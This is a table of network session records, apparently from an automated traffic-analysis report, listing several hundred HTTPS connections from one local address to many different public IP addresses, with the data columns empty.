                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13394192.168.2.14599141.198.118.17443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13395192.168.2.1448076131.30.185.84443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13396192.168.2.1437458212.123.193.207443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13397192.168.2.1436814164.147.137.16443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13398192.168.2.145983083.69.151.110443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13399192.168.2.145970265.206.239.187443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13400192.168.2.1436214208.5.139.34443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13401192.168.2.145630473.32.181.9443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13402192.168.2.144729027.56.149.78443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13403192.168.2.1456352182.115.43.252443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13404192.168.2.1454608176.63.153.205443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13405192.168.2.1460092195.132.123.56443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13406192.168.2.1449552206.91.233.250443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13407192.168.2.144028436.139.129.65443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13408192.168.2.1441282217.14.60.41443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13409192.168.2.143656089.158.183.238443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13410192.168.2.1434270111.49.101.112443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13411192.168.2.1446540168.89.212.42443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13412192.168.2.1441408146.197.204.191443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13413192.168.2.1442422106.123.138.161443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13414192.168.2.1450578154.221.175.226443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13415192.168.2.1452320199.99.132.96443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13416192.168.2.1450236179.113.43.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13417192.168.2.143916813.142.151.216443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13418192.168.2.144980018.38.19.116443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13419192.168.2.1457932180.57.85.128443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13420192.168.2.1456328222.129.84.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13421192.168.2.1456492163.45.46.255443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13422192.168.2.1445164136.47.156.115443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13423192.168.2.1439228194.63.83.234443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13424192.168.2.144539413.168.132.67443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13425192.168.2.1441248121.19.12.125443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13426192.168.2.1441930178.110.26.229443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13427192.168.2.1439254140.72.58.139443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13428192.168.2.144559851.147.114.55443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13429192.168.2.1447402128.186.178.113443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13430192.168.2.145218257.162.3.60443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13431192.168.2.1440546172.3.224.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13432192.168.2.1453276163.41.233.216443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13433192.168.2.1442502139.39.194.205443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13434192.168.2.145581083.137.88.215443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13435192.168.2.1451032122.225.120.184443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13436192.168.2.143304873.6.11.174443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13437192.168.2.145056238.230.180.65443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13438192.168.2.1436348211.255.230.119443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13439192.168.2.1451826187.230.135.47443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13440192.168.2.144999677.229.155.2443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13441192.168.2.1440220168.69.53.26443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13442192.168.2.145836863.183.154.221443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13443192.168.2.144344214.171.116.132443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13444192.168.2.143489295.100.28.119443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13445192.168.2.1459296106.47.113.28443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13446192.168.2.143565288.202.82.129443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13447192.168.2.1449014142.31.239.8443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13448192.168.2.145260298.186.32.236443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13449192.168.2.1450228193.100.42.30443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13450192.168.2.145817674.92.230.201443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13451192.168.2.1441260126.22.51.132443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13452192.168.2.145430812.1.3.125443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13453192.168.2.1438064177.37.101.39443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13454192.168.2.144454463.1.59.183443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13455192.168.2.144380297.214.155.167443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13456192.168.2.145943675.214.203.177443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13457192.168.2.1436512211.79.225.100443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13458192.168.2.1449798106.40.195.209443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13459192.168.2.1436536180.30.196.1443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13460192.168.2.145324068.244.182.35443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13461192.168.2.1456050204.64.223.183443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13462192.168.2.146027440.220.46.34443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13463192.168.2.1459454134.56.14.143443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13464192.168.2.145149479.174.182.9443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13465192.168.2.1458692159.17.137.122443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13466192.168.2.144828876.124.202.206443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13467192.168.2.145998813.200.253.8443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13468192.168.2.14457344.38.45.144443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13469192.168.2.1436058187.193.234.227443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13470192.168.2.1448080137.255.201.17443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13471192.168.2.1439328173.41.26.196443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13472192.168.2.1443096117.210.188.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13473192.168.2.143524661.239.182.209443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13474192.168.2.144103448.15.184.97443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13475192.168.2.1436752115.113.38.86443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13476192.168.2.1458524174.158.226.85443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13477192.168.2.1449064103.46.169.199443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13478192.168.2.1442812209.235.162.6443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13479192.168.2.144255284.70.33.170443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13480192.168.2.1433450132.222.184.107443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13481192.168.2.145842051.146.61.41443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13482192.168.2.144280032.190.192.228443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13483192.168.2.1433870219.127.249.23443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13484192.168.2.1453098184.213.227.64443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13485192.168.2.144795876.78.57.162443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13486192.168.2.1442028157.228.148.115443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13487192.168.2.145330471.55.195.151443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13488192.168.2.143323218.175.236.142443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13489192.168.2.145510870.59.4.5443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13490192.168.2.1447972165.199.48.36443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13491192.168.2.1450522129.173.21.99443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13492192.168.2.1446222194.91.172.117443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13493192.168.2.1460828160.51.147.242443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13494192.168.2.1449706129.152.38.212443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13495192.168.2.1449746123.183.37.177443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13496192.168.2.1436652130.93.174.227443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13497192.168.2.1456976200.117.215.135443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13498192.168.2.1451156179.72.12.20443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13499192.168.2.144427018.201.207.252443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13500192.168.2.1439312112.123.206.10443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13501192.168.2.144202823.186.192.198443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13502192.168.2.1437616223.191.40.244443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13503192.168.2.1448512143.33.107.114443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13504192.168.2.144754092.7.100.28443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13505192.168.2.1441480164.30.121.50443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13506192.168.2.1460662212.1.122.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13507192.168.2.1446914197.191.147.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13508192.168.2.1436058149.74.68.184443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13509192.168.2.14591408.55.131.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13510192.168.2.1453106219.27.26.105443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13511192.168.2.1448734114.157.56.19443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13512192.168.2.143772677.80.218.129443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13513192.168.2.1450752145.153.10.144443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13514192.168.2.1459134222.32.85.53443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13515192.168.2.144663682.202.75.184443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13516192.168.2.1452258165.189.243.144443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13517192.168.2.143293613.89.124.134443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13518192.168.2.1449094222.116.161.3443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13519192.168.2.1434004119.88.150.171443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13520192.168.2.143428274.150.76.135443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13521192.168.2.144349437.243.148.155443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13522192.168.2.1460074140.52.234.161443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13523192.168.2.145658866.23.164.68443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13524192.168.2.1456534154.213.218.255443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13525192.168.2.143421442.15.240.39443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13526192.168.2.1446958154.51.140.177443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13527192.168.2.1443366140.64.79.76443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13528192.168.2.145163880.231.220.225443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13529192.168.2.1445682136.129.93.197443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13530192.168.2.143414653.7.128.112443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13531192.168.2.143361488.7.224.38443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13532192.168.2.1458156157.166.63.25443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13533192.168.2.145709614.104.49.32443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13534192.168.2.1445504179.173.254.194443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13535192.168.2.1435666177.241.100.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13536192.168.2.1439018222.229.3.220443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13537192.168.2.14471849.21.175.114443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13538192.168.2.1444246111.135.52.163443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13539192.168.2.1442084199.199.243.177443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13540192.168.2.1452186223.24.131.198443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13541192.168.2.144762288.244.178.10443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13542192.168.2.14595362.149.184.119443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13543192.168.2.1440328209.215.37.10443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13544192.168.2.1450146220.111.240.253443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13545192.168.2.1458858181.178.61.9443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13546192.168.2.143988464.241.234.82443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13547192.168.2.1459128141.64.114.136443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13548192.168.2.1442324150.72.163.222443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13549192.168.2.145826680.72.175.166443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13550192.168.2.144390690.53.154.53443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13551192.168.2.144896827.67.156.9443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13552192.168.2.143643061.221.59.67443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13553192.168.2.1438342218.122.216.215443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13554192.168.2.145648812.84.110.247443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13555192.168.2.1439142122.253.155.36443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13556192.168.2.1457996167.162.138.98443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13557192.168.2.144764850.80.193.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13558192.168.2.1458112223.99.83.173443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13559192.168.2.146063045.221.235.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13560192.168.2.1435348107.200.135.123443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13561192.168.2.144302832.113.228.19443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13562192.168.2.143442845.24.199.114443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13563192.168.2.1454088116.35.132.132443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13564192.168.2.14387782.43.98.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13565192.168.2.1433270117.29.239.177443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13566192.168.2.144634697.124.107.222443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13567192.168.2.1440252177.66.62.85443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13568192.168.2.144422277.211.192.113443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13569192.168.2.144698877.69.123.117443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13570192.168.2.143895267.106.107.253443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13571192.168.2.144757219.133.9.209443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13572192.168.2.143656266.109.113.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13573192.168.2.143867467.32.102.81443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13574192.168.2.1452166195.229.205.130443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13575192.168.2.1433262162.188.63.154443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13576192.168.2.1449114200.205.44.13443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13577192.168.2.143544890.89.135.174443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13578192.168.2.143952098.54.6.217443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13579192.168.2.1451778217.191.220.68443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13580192.168.2.1441234206.208.252.209443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13581192.168.2.144290873.234.167.139443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13582192.168.2.145950098.107.138.94443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13583192.168.2.1444564154.143.164.190443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13584192.168.2.1455208154.74.50.255443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13585192.168.2.144677877.227.109.96443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13586192.168.2.1434312101.222.186.136443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13587192.168.2.1448198112.69.15.31443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13588192.168.2.1449444196.18.105.102443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13589192.168.2.143834684.70.74.110443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13590192.168.2.144204248.131.142.52443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13591192.168.2.1440746116.98.109.252443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13592192.168.2.1453330130.111.60.87443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13593192.168.2.1440838129.2.6.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13594192.168.2.143781079.88.198.62443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13595192.168.2.144276240.143.69.38443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13596192.168.2.1443248107.42.167.181443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13597192.168.2.144129486.251.209.51443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13598192.168.2.144353465.163.254.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13599192.168.2.144066461.229.160.67443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13600192.168.2.145352434.255.85.69443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13601192.168.2.145019847.15.105.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13602192.168.2.144563014.57.143.192443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13603192.168.2.14536769.65.196.215443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13604192.168.2.1457982119.18.25.251443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13605192.168.2.144165464.1.28.68443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
